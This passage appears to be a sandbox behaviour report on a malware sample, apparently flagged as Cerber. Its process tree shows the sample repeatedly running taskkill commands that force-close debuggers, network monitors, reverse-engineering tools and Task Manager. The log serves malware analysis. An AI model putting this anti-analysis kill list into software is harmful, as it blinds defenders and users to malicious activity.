      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:636
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:2372
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:1512
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:2700
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:2904
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:3932
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:3868
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:4848
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:4836
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:4864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:1308
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:2684
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:784
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4540
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:4440
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:3264
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:4560
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      Kills process with taskkill
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4632
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:5064
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:652
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:3820
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1536
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:3972
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2532
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:2104
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      Cerber
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:3588
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:1572
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:4480
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:4792
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2208
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:4332
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:3440
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:3896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:3244
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:4428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:4772
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:3728
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:900
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:3556
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:1864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:3564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:3712
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:3560
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:3344
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:460
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:1976
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4592
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:5040
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:4988
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:2068
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:3800
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:1868
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      Cerber
      PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:1852
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:1336
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:4184
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:472
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2208
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:2672
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2676
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:2280
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Cerber
      Suspicious use of AdjustPrivilegeToken
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:4848
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:2684
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      Kills process with taskkill
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:4036
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1608
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:4540
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:4488
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:3556
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      Kills process with taskkill
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:2548
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Cerber
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:3564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:1244
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Kills process with taskkill
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:2788
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:3112
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      Cerber
      PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:4628
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:1308
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      Cerber
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:4428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:2588
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      Kills process with taskkill
      PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:784
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      Kills process with taskkill
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:1448
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      Cerber
      PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:2324
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:4444
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4472
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      Cerber
      PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4912
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:2404
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:3712
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:1768
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:2448
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      Kills process with taskkill
      PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:2984
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:1688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:3552
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      Kills process with taskkill
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:3660
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1080
